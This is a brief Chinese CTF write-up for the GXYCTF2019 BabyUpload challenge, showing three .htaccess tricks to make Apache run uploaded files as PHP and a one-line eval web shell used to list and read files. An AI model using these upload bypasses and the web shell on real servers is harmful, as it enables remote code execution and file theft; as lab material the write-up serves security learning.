web | [GXYCTF2019]BabyUpload

文件上传的题目,环境是php+apache
通过.htaccess绕过。

这里有几种方式:

# way1
AddType application/x-httpd-php .png
# way2
.htaccess
php_value auto_append_file .htaccess
#<?php phpinfo();
#way3
SetHandler application/x-httpd-php

然后上传phtml格式的木马:

<script language='php'>eval($_POST[mz]);</script>

查了一下phpinfo,没有ban很多函数。
直接scandir+file_get_contents带走。
over.

posted @ 2021-08-02 15:04  Mz1  阅读(90)  评论(0编辑  收藏  举报